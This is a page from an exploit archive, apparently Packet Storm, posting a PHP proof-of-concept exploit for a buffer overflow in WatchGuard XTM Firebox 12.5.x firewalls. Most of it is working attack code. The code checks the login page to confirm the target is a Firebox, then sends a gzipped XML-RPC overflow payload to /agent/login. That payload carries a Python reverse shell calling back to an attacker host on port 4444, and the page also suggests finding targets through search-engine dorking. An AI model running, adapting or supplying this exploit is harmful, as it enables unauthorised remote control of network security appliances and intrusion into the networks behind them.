exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WatchGuard XTM Firebox 12.5.x Buffer Overflow

WatchGuard XTM Firebox 12.5.x Buffer Overflow
Posted Oct 15, 2024
Authored by indoushka

WatchGuard XTM Firebox version 12.5.x suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | 78e6c67201f4e49d3389589aa7f41fc87652c0fde365477237abb7c91d9f8057

WatchGuard XTM Firebox 12.5.x Buffer Overflow

Change Mirror Download
=============================================================================================================================================
| # Title : WatchGuard XTM Firebox 12.5.x Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.watchguard.com/wgrd-help/documentation/xtm |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 86 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :


<?php
class WatchGuardExploit {
private $targetUri;
private $lhost;
private $lport;
private $shell;

public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") {
$this->targetUri = $targetUri;
$this->lhost = $lhost;
$this->lport = $lport;
$this->shell = $shell;
}

public function sendRequest($method, $url, $data = null, $headers = []) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}

if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}

$response = curl_exec($ch);
curl_close($ch);

return $response;
}

public function checkWatchGuardFirebox() {
$url = $this->targetUri . '/auth/login';
$response = $this->sendRequest('GET', $url, null, ['from_page' => '/']);

if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false
&& strpos($response, 'Firebox') !== false) {
return true;
}
return false;
}

public function createBofPayload() {
// Generate the buffer overflow payload with Python reverse shell code
$randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric
$pyFilename = "/tmp/" . $randomStr . ".py";
$payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>";
$payload .= str_repeat('<BBBBMFA>', 3680);

// Include a Python reverse shell command as the payload
$payload .= 'import socket;from subprocess import call; from os import dup2;';
$payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);';
$payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));';
$payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);';
$payload .= 'call(["' . $this->shell . '","-i"]);';
$payload .= 'import os; os.remove("' . $pyFilename . '");';

return gzencode($payload); // gzip encoding
}

public function exploit() {
if (!$this->checkWatchGuardFirebox()) {
echo "Target is not vulnerable.\n";
return;
}

echo "Target is vulnerable. Sending exploit...\n";
$bofPayload = $this->createBofPayload();

// Send the buffer overflow payload
$url = $this->targetUri . '/agent/login';
$this->sendRequest('POST', $url, $bofPayload, [
'Accept-Encoding: gzip, deflate',
'Content-Encoding: gzip'
]);

echo "Payload sent.\n";
}
}

// Example usage:
$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);
$exploit->exploit();



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close